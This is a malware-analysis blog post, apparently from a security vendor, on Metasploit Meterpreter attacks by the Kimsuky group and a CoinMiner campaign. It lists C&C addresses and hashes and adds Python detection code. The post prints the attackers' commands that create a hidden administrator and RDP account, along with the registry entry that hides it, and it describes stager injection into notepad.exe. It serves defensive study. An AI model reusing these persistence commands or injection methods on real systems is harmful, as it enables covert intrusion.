Attack Cases Using Metasploit Meterpreter

Metasploit is a framework used in penetration testing. It can be used to inspect the networks and systems of companies and organizations for security vulnerabilities, and it provides features for each stage of a penetration test. Like Cobalt Strike, it covers every stage, from creating various types of payloads for the initial infection and stealing account information to taking over the system via lateral movement.

While Cobalt Strike is commercial software, cracked versions of it have leaked and are often used by attackers. Metasploit, on the other hand, is an open-source program that is publicly available and can therefore easily be abused. This post discusses actual cases where Metasploit Meterpreter was used in attacks.

Figure 1. Metasploit GitHub

Metasploit Meterpreter

Cobalt Strike provides Beacon, the actual malware that operates as a backdoor on the infected PC. Depending on how Beacon is installed, it is classified as Staged or Stageless. When Cobalt Strike is built with the Staged method, a PowerShell script or small shellcode with a downloader feature is created. The attacker can distribute such a small stager through various means. When the stager is executed on the infected PC, it downloads Beacon, the main malware, into memory and runs it. The Stageless method instead creates a binary that already contains Beacon, so the binary can communicate directly with the C&C server without having to download Beacon first.

Metasploit also provides a backdoor called Meterpreter that performs the actual malicious behaviors, like Beacon in Cobalt Strike. Like Beacon, it can be created in both Staged and Stageless forms. This means that both Cobalt Strike and Metasploit, although penetration testing tools, can be used to control an infected PC and steal information.

Both of the following cases use the staged method. Instead of including Meterpreter in the distributed file, a shellcode that downloads the backdoor containing Meterpreter is included. Note that the shellcode shown below is the one embedded in the PowerShell-form stager used in the second case; it downloads Meterpreter by connecting to 122.165.141[.]2:8888.

To be more precise, the downloaded file is metsrv.dll, the basic backdoor of Meterpreter. The file is built to be executed with the Reflective DLL injection method, as shown below. One characteristic of this method is that the start of the file (the part beginning with MZ) is also valid code, so the code reached through the MZ bytes loads the DLL file itself into memory. When the loading is complete (in other words, when the Reflective DLL injection is finished), control is handed over to the actual code of metsrv.dll. Note that Meterpreter is modularized by feature: besides the default metsrv.dll, it supports various extension DLLs for privilege escalation or additional tasks.

Figure 2. Meterpreter using Reflective DLL injection method
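As an added example (not code from the original post or from the Metasploit project), the following Python scanner checks the property described above: whether the bytes right after an MZ signature are loader code rather than the normal DOS-header fields. The x86/x64 stub byte patterns, the constructed sample headers and the fake memory blob are assumptions made for this example.

```python
import struct

# Normal DOS header fields after "MZ" (e_cblp, e_cp) are 90 00 03 00. A reflective
# Meterpreter DLL carries executable bytes there instead. The two stub patterns below
# are assumptions for this example, modelled on the x86 and x64 reflective loaders:
#   x86: MZ E8 00 00 00 00 5B ...  "call $+5 / pop ebx" so the code learns its own address
#   x64: MZ 41 52 55 48 89 E5 ...  "MZ" decodes as "pop r10", then push r10 / push rbp / mov rbp,rsp
X86_STUB = bytes.fromhex("e800000000")
X64_STUB = bytes.fromhex("4152554889e5")
DOS_HEADER_LEN = 0x40

def analyze_mz_header(data: bytes) -> dict:
    """Classify the first 0x40 bytes of a candidate PE image."""
    info = {"is_pe": False, "executable_header": False, "arch": None, "e_lfanew": None}
    if len(data) < DOS_HEADER_LEN or data[:2] != b"MZ":
        return info
    info["is_pe"] = True
    info["e_lfanew"] = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the PE header
    after_mz = data[2:]
    if after_mz.startswith(X86_STUB):
        info["arch"] = "x86"
    elif after_mz.startswith(X64_STUB):
        info["arch"] = "x64"
    info["executable_header"] = info["arch"] is not None
    return info

def scan_for_reflective_headers(blob: bytes) -> list:
    """Return (offset, arch) for every MZ header in a memory blob whose header bytes are code."""
    hits, pos = [], blob.find(b"MZ")
    while pos != -1:
        verdict = analyze_mz_header(blob[pos:pos + DOS_HEADER_LEN])
        if verdict["executable_header"]:
            hits.append((pos, verdict["arch"]))
        pos = blob.find(b"MZ", pos + 1)
    return hits

def make_dos_header(after_mz: bytes, e_lfanew: int = 0x80) -> bytes:
    """Build a constructed 0x40-byte DOS header for testing (not taken from a real file)."""
    return (b"MZ" + after_mz).ljust(0x3C, b"\x00") + struct.pack("<I", e_lfanew)

# Constructed samples: an ordinary header, two reflective-style headers, and a fake memory blob.
BENIGN_HEADER = make_dos_header(bytes.fromhex("90000300"))
REFLECTIVE_X86 = make_dos_header(X86_STUB + bytes.fromhex("5b5245"))
REFLECTIVE_X64 = make_dos_header(X64_STUB + bytes.fromhex("4881ec20000000"))
MEMORY_BLOB = b"\x00" * 37 + BENIGN_HEADER + b"junkMZ" + b"\x00" * 10 + REFLECTIVE_X64
```

Run over a process memory dump, scan_for_reflective_headers reports each MZ header that starts with loader code instead of DOS-header fields, which is the trait of the injected metsrv.dll discussed above.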

Kimsuky Group

The Kimsuky group also uses Metasploit Meterpreter. While monitoring Metasploit malware, the ASEC analysis team confirmed a case where Meterpreter operates inside the rundll32.exe process. The actual malware is a 64-bit DLL that is loaded and executed by the regsvr32.exe process. It then launches the normal program rundll32.exe and injects the stager shellcode into it, so that Meterpreter ends up operating inside rundll32.exe.

The injected shellcode downloads Meterpreter into memory from 79.133.41[.]237:4001 and runs it. The following is the Meterpreter DLL downloaded from the Metasploit C&C server; it matches the binary found in the memory area mentioned above.

Figure 3. Meterpreter DLL being downloaded

The downloaded binary matches the source code of the open-source Meterpreter.

Figure 4. server_setup() function that is the initial routine of downloaded metsrv.dll

AhnLab’s cloud-based ASD (AhnLab Smart Defense) infrastructure collects and analyzes various types of malware in real time. By extracting only the malicious DNA from malware, it creates patterns that can be used for detection. According to the DNA patterns currently in ASD, there have been multiple files similar to this malware.

Looking only at the publicly known files among those with similar forms shows that their C&C server addresses are all IP addresses related to the Kimsuky group. Meterpreter can no longer be downloaded for the previous samples. Yet apart from external characteristics (for example, the 64-bit DLL form), they are nearly identical to each other: they are executed in regsvr32.exe, launch the normal program rundll32.exe, and inject the Metasploit stager. All of them also use Meterpreter’s x64 Reverse TCP Stager method.

[Additional File 1]
– MD5: 7f4624a8eb740653e2242993ee9e0997
– C&C: 27.102.127[.]240:3001
– Collected Date: March 18th, 2021
[Additional File 2]
– MD5: d4da4660836d61db95dd91936e7cfa4a
– C&C: 27.102.127[.]240:3001
– Collected Date: May 22nd, 2021
[Additional File 3]
– MD5: d5ad5ffde477e3bc154a17b4d74f401b
– C&C: 31.172.80[.]104:3001
– Collected Date: May 21st, 2021

The following shows the routine that injects the stager shellcode into rundll32.exe. Note that the decoding method is identical to that of AppleSeed, another backdoor recently used by the Kimsuky group.

Figure 5. Decoding routine same as that of AppleSeed, another backdoor malware of Kimsuky

The Kimsuky group has been using various types of backdoor malware. Recently, it was found that the group is also using the Meterpreter backdoor of the open-source Metasploit framework. The attacker can abuse the various features Metasploit provides for each penetration stage to steal user information and execute malicious commands.

Meterpreter Installed with CoinMiner

There have also been cases of Meterpreter being distributed together with CoinMiner. While the team could not find any information about how the attacker gained access to the system and sent commands (the initial attack path), it could examine the behavior of the later stages through the many files found in the download path.

Figure 6. Infection flow

1) Installing Miner
Among the batch files that can be downloaded, brgolbat2.bat, golbat.bat, and golbat2.bat are all similar. golbat.bat, which has the most items, is the one analyzed here. The file downloads and installs multiple files using PowerShell.

After downloading defender.reg and registering the C:\Windows\System32\ path as a Windows Defender exclusion path, it installs the XMRig miner. Besides XMRig, other files are also installed, such as the settings file config.json, which includes the mining pool URL, and the driver file WinRing0x64.sys, a supplementary tool for enhancing XMRig performance. The XMRig miner is then registered in the task scheduler to be executed periodically.

Figure 7. config.json file

2) Installing Meterpreter
While the initial distribution method was not discovered, it appears that the attacker executed the batty.bat file along with the CoinMiner installer mentioned above. The file mainly has the following features: adding an exclusion for Windows Defender, collecting basic information about the current system, registering an RDP user for later access, and installing the Metasploit Meterpreter backdoor.

It first creates an account named ‘cli’ using the following commands and adds it to the administrators group and the Remote Desktop Users group.

> net user cli 83ys44b /add
> net localgroup administrators cli /add
> net localgroup "Remote Desktop Users" cli /add

It then registers the account under the SpecialAccounts registry key using the downloaded user.reg. If an account is registered under the SpecialAccounts\UserList key with a value of 0 as shown below, it is not displayed on the logon screen, so the user cannot tell that the account has been added.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"cli"=dword:00000000
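The account creation and hiding steps above, as an added triage example that is not part of the original post: it parses a batch file for the net user/localgroup ... /add commands and a .reg file for SpecialAccounts\UserList entries, and reports accounts that were granted administrator or RDP access and then hidden from the logon screen. The sample batch and .reg text are constructed from the commands and registry content shown above.

```python
import re
import shlex
# Constructed samples modelled on the batty.bat commands and the user.reg content shown above.
BATCH_SAMPLE = """@echo off
net user cli 83ys44b /add
net localgroup administrators cli /add
net localgroup "Remote Desktop Users" cli /add
"""
REG_SAMPLE = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"cli"=dword:00000000
"""

USERLIST_SUFFIX = r"\winlogon\specialaccounts\userlist"
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-f]{8})$', re.IGNORECASE)

def parse_net_commands(batch_text):
    """Return {account: set(groups)} for accounts touched by 'net user/localgroup ... /add'."""
    accounts = {}
    for line in batch_text.splitlines():
        try:
            tok = [t.lower() for t in shlex.split(line)]
        except ValueError:
            continue  # unbalanced quotes: not a command we can parse
        if len(tok) >= 3 and tok[:2] == ["net", "user"] and "/add" in tok:
            accounts.setdefault(tok[2], set())
        elif len(tok) >= 4 and tok[:2] == ["net", "localgroup"] and "/add" in tok:
            accounts.setdefault(tok[3], set()).add(tok[2])
    return accounts

def parse_hidden_accounts(reg_text):
    """Return account names a .reg file hides from the logon screen (UserList value 0)."""
    hidden, in_userlist = set(), False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_userlist = line[1:-1].lower().endswith(USERLIST_SUFFIX)
            continue
        m = DWORD_RE.match(line)
        if in_userlist and m and int(m.group(2), 16) == 0:
            hidden.add(m.group(1).lower())
    return hidden

def triage_account_changes(batch_text, reg_text):
    """Combine both parsers: which accounts got admin/RDP access and were then hidden."""
    hidden = parse_hidden_accounts(reg_text)
    return [{"account": n, "groups": sorted(g), "hidden_from_logon": n in hidden,
             "high_risk": "administrators" in g and n in hidden}
            for n, g in parse_net_commands(batch_text).items()]
```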

Among the additional batch files that are downloaded and executed is avscan.bat. This file outputs various types of information, ranging from the anti-malware products installed on the infected system to the computer name, graphics card name, MAC address, public IP address, and so on.

Lastly, batty.bat registers rdpclip.bat in the task scheduler as “Remote Desktop Clipboard” and runs the file. Using the netstat command, rdpclip.bat checks whether any process is currently using port 8888; if none is, it terminates the notepad.exe process and executes rdpclip-run.bat. This is done because the Metasploit Meterpreter installed later uses that port.

rdpclip-run.bat simply runs rdpclip.ps1, located in the same path, using PowerShell. rdpclip.ps1 is a Metasploit stager PowerShell script containing x64 shellcode. When the script is executed, the shellcode is executed in memory; it downloads and runs the Meterpreter binary, so Meterpreter ends up running inside the powershell process through the stager.

Figure 8. Metasploit stager powershell

The attacker created the payloads with the x64 Staged Reverse TCP method and chose the PowerShell format rather than EXE files. The attacker also specified notepad.exe (Notepad) with the PrependMigrateProc option. When the payload is executed, this option creates the named normal process and injects Meterpreter into it, disguising the process running Meterpreter as a normal one. For instance, when the rdpclip.ps1 script discussed earlier is executed, it injects Meterpreter into notepad.exe and starts it there. So in the infected environment, it is notepad.exe, rather than PowerShell or another suspicious process, that performs the backdoor activities.
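Both injection hosts described in this post (rundll32.exe started by regsvr32.exe in the Kimsuky case, and notepad.exe started by powershell.exe through PrependMigrateProc here) can be spotted from process-creation and network telemetry: a normal program launched with no arguments by an unusual parent, which then opens an outbound connection. The detection logic below is an added example, not code from the original post; the Sysmon-style event format, PIDs and file paths are assumptions constructed for it.

```python
# Constructed Sysmon-style events (not real telemetry): PIDs, the DLL path and the benign
# notepad document are invented; the two C&C addresses are the ones named in this post.
EVENTS = [
    {"type": "process_create", "pid": 4120, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\Public\update.dll", "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 4188, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\System32\rundll32.exe"', "parent_image": r"C:\Windows\System32\regsvr32.exe"},
    {"type": "network_connect", "pid": 4188, "image": r"C:\Windows\System32\rundll32.exe",
     "dest_ip": "79.133.41.237", "dest_port": 4001},
    {"type": "process_create", "pid": 5200, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe"',
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "network_connect", "pid": 5200, "image": r"C:\Windows\System32\notepad.exe",
     "dest_ip": "122.165.141.2", "dest_port": 8888},
    {"type": "process_create", "pid": 6000, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt',
     "parent_image": r"C:\Windows\explorer.exe"},
]
# Parent -> child pairs matching the two injection hosts described in this post.
SUSPICIOUS_PARENT_CHAINS = {
    ("regsvr32.exe", "rundll32.exe"),   # Kimsuky: regsvr32-loaded DLL starts rundll32 and injects the stager
    ("powershell.exe", "notepad.exe"),  # CoinMiner case: PrependMigrateProc moves Meterpreter into notepad
}
NO_NETWORK_EXPECTED = {"notepad.exe", "rundll32.exe"}  # neither should open outbound connections

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def launched_without_arguments(ev):
    """True when the command line is only the image path, typical of a process started just to host injected code."""
    return ev["cmdline"].strip().strip('"').lower() == ev["image"].lower()

def detect_meterpreter_hosts(events):
    alerts, injected = [], {}  # injected: pid -> parent chain that created it
    for ev in events:
        image = basename(ev["image"])
        if ev["type"] == "process_create":
            chain = (basename(ev.get("parent_image", "")), image)
            if chain in SUSPICIOUS_PARENT_CHAINS and launched_without_arguments(ev):
                injected[ev["pid"]] = " -> ".join(chain)
                alerts.append({"rule": "suspicious_parent_chain", "pid": ev["pid"],
                               "severity": "medium", "detail": injected[ev["pid"]]})
        elif ev["type"] == "network_connect" and image in NO_NETWORK_EXPECTED:
            # A connection from a host we saw created suspiciously is the reverse-TCP stager calling home.
            sev = "high" if ev["pid"] in injected else "medium"
            alerts.append({"rule": "unexpected_network", "pid": ev["pid"], "severity": sev,
                           "detail": f"{image} -> {ev['dest_ip']}:{ev['dest_port']}"})
    return alerts
```

The benign notepad.exe opened from Explorer with a document produces no alert, while the two injected hosts each raise a medium parent-chain alert followed by a high-severity network alert once they call out.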

Conclusion

The number of attacks targeting individuals and companies has risen recently. Penetration testing tools are also often used during the process of taking over companies’ internal networks after the initial compromise. The tools selected are those that provide various features and can be easily obtained, such as Cobalt Strike or Metasploit. Attackers are abusing such programs to attack ordinary users and, ultimately, to take over companies’ systems in order to leak confidential information or install CoinMiner and ransomware and inflict financial damage.

AhnLab products have process memory-based detection technologies for the Meterpreter backdoor, which performs malicious behaviors by receiving commands from the attacker, starting from the initial compromise stage in which Metasploit is used. Users should apply the latest patches for the OS and programs such as Internet browsers, and update products including V3 to the latest version to prevent malware infection in advance.

[File Detection]

Trojan/Win.Agent.C4408533 (2021.04.09.03)
Trojan/Win.Agent.R422617 (2021.05.26.04)
Trojan/Win.Agent.R436488 (2021.08.12.00)
Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
Downloader/BAT.Generic (2021.08.31.03)
Downloader/PowerShell.Generic (2021.08.31.03)

[IOC Info]

